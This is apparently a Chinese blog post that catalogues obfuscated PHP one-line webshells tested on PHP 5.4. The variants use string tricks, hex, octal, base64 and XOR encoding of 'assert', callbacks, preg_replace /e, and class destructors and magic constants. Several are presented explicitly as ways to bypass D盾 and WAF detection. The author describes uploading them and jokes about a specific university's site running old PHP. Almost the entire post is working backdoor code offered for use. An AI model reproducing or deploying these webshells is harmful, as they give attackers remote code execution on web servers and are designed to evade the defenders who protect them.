基于php一句话木马的变种总结

说实话php我只是在w3c系统的看了30分钟，对不是3天30天3个小时是30分钟

那我能不能说我花半个小时接通了一门计算机语言呢      （逃

需要记住的是：熟读PHP手册就会有不一样的发现

 

贴上来的都是亲测能用 php5.4.45  apache phpstudy环境

 

$_GET函数数据来源的web响应木马

@system($_GET['shell']) 

@passthru($_GET['shell'])

同样也适用于以下变形

 

字符串(变量)变形

assert()相比较于eval()要灵活许多（只适用于php7.1以下版本）

 

substr_replace()              //函数把字符串的一部分替换为另一个字符串

<?php
$a = substr_replace('assxxx','ert',3);
@$a($_POST['shell']);
?>

（PHP版本为7.2.10时挂马失败，php5.4.45时可以成功）

 

chr()          //从指定 ASCII 值返回字符

<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$a($_POST['shell']);
?>

strrev()      //反转字符串。

<?php
$a = strrev('tressa');;
@$a($_POST['shell']);
?>

parse_str()   //把查询字符串解析到变量中。

<?php
parse_str("name=assert");
$name($_POST['shell']);
?>

//   \xhh   hh十六进制编码的字符

<?php
$s = "\x61\x73\x73\x65\x72\x74";    
@$s($_POST['shell']);
?>

//    \ddd   ddd八进制编码的字符，或者后向引用

<?php
$a = "\141\163\163\145\162\164";     
$a($_POST['shell']);
?>

//通过中文乱码字符与strlen(),chr()函数相结合调用assert

<?php
$s = chr(strlen('R楝櫇賩矟m蛖?o礏!襔翻%豑翻%豑Ωv閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('楝櫇賩矟m蛖稤廕?赫?o!捣dl豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl7o?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧'));$s($_POST['shell']);     
?>

 

重新定义函数

<?php
function alexznb($a){
@assert($a);
}
alexznb($_POST['shell']);
?>

简要地说就是将原本一句马变形成一个函数，在此函数上定义木马语句，此原理反之亦然，在此就不多赘述

 

回调函数

回调函数的意思大概就是，在一个函数里，通过调用回调函数（系统函数库里的函数不能随便起名），把一个数组里的元素挨个传递给函数A，最后把函数A里面最后执行数组元素后的结果，一一呈现出来，这就是回调函数。

为了便于理解我编了如下基础的回调函数代码，试着看看或许能够更好地理解

 

大概就是这个意思，这里使用的是call_user_func_array()函数

我们在用该函数试试一句马：

<?php
@call_user_func_array(assert,array($_POST['shell']));  
?>

很棒，上去了

 

 (你们没有看到我的Tor browser)

回调函数变形：

为了便于理解源码，基本上每一行后面我都加了注释，为此我还很羞愧的恶补了20分钟的php面向对象编程的模块

<?php

class loveme {     //类开始  php中通过class定义类

public $x;   

public $y;    //定义$x,$y两个类属性；PHP类属性内与变量非常相似，对象的属性可以存储单个值，值数组，甚至另一个对象。



function __construct($a,$b) {      //定义方法 __construct

$this->x=$a;      //使用this访问当前类的属性$x和$y，赋值给方法的$a,$b两个变量

$this->y=$b;

}

function test() {      //定义方法 test

array_map($this->x,$this->y);       //方法内调用回调函数

}

}      //类结束



$p1=new loveme(assert,array($_POST['shell']));      //从lovem类中创建对象命名为 p1

$p1->test();       //对象$p1指向类loveme的test方法，相当于调用test

?>

 

特殊字符链接干扰

 

基本变化形式

<?php
@$s = $_POST['shell'];

$z = null;

eval($z.$s);
?>

添加换行符（\n）

<?php
@$s = $_POST['shell'];

$z = "\n";   

eval($z.=$s);
?>

特别需要注意这里只能使用双引号，单引号不行   因为php里的单引号把内容当成纯文本，不会经过服务器翻译。而双引号则与此相反。里面的内容会经过服务器处理(process).

 

\r   回车 (十六进制 0D)

\t   水平制表符 (十六进制 09)

 

https://www.php.net/manual/zh/regexp.reference.escape.php

php官方文档对转义字符的解释（中文的四级没过也能看得懂！）

 

preg_replace()函数

 

<?php
@preg_replace("/abcde/e", $_POST['shell'], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串，但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式，按照PHP的格式，表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”，那么这个函数的第二个参数就会被当作代码执行。

 

数组

一维数组

<?php
$a = substr_replace("assexx","rt",4);

@$b=[''=>$a($_POST['shell'])];
?>

这里在$a里面还字符串变形了一次

<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);

@$b=[''=>$a($_POST['shell'])];
?>

同样的变化，只是assert变为了十六进制字符组合后，放入一维数组 " " 中

 

多维数组

<?php
$b = substr_replace("assexx","rt",4);

$a = array($arrayName = array('a' => $b($_POST['shell'])));
?>

 

类

用类把函数包裹,D盾对类查杀较弱

<?php

class me{

         public $a = '';   //定义类A的属性$a为一个数组

         function __destruct(){   //定义__destruct方法

                 assert("$this->a"); 

         }

 }

 $b = new me;

 $b->a = $_POST['x'];

?>

 

魔术常量

据说D盾对类的查杀较弱，可以使用类的魔术常量构造一句马

<?php

class test {         //类 test

    function assert()    //定义了一个实例，命名为assert

    {

    $f = __FUNCTION__ ;

    @$f($_POST['shell']);

    }

}

$t = new test();

$t->assert();

?>

就是定义一个叫做test的类，然后创建一个叫做assert的方法，属性里面用魔术常量将方法名赋值给变量，最后创建一个实例以调用这个系统，挂刀试试：

 

舒服了，很舒服

（但是php7.1以上用不了，但估计陕西**大学的教务网也用不起那么高版本的php）

 

编码绕过

通过base64编码构造一句马基础：

<?php
$a = base64_decode("YXNzZXJ0");

$a($_POST[x]);
?>

 

上一个综合较强的php一句马

（类，异或编码，字符拼接）（据说能绕D盾）

<?php

class ZXVG

{

    public $c='';

    public function __destruct()

    {

        $_0='&'^"\x47";

        $_1='C'^"\x30";

        $_2='A'^"\x32";

        $_3='v'^"\x13";

        $_4='J'^"\x38";

        $_5='f'^"\x12";

        $db=$_0.$_1.$_2.$_3.$_4.$_5;

        return @$db($this->c);

    }

}

$zxvg=new ZXVG();

@$zxvg->c=$_POST['shell'];

?>

以上总结都是基本形式，就像是乐高的基础部件，其中的每一段都能与任意无数的变种思路相结合，变化出无数种的形式，排列组合一定有一种能绕过所知的waf墙，那就看如何去灵活使用变化了

总结的话语总是那么的苍白无力，不如拿起电脑敲一敲试一试，在实践中的挂马总会是富有激情的探索之路。 

无论在怎么样，这些一句话马也是只能应用于php7.1之下版本的服务器中，在往上的话，或许只能尝试大马或变态的eval()函数了；

over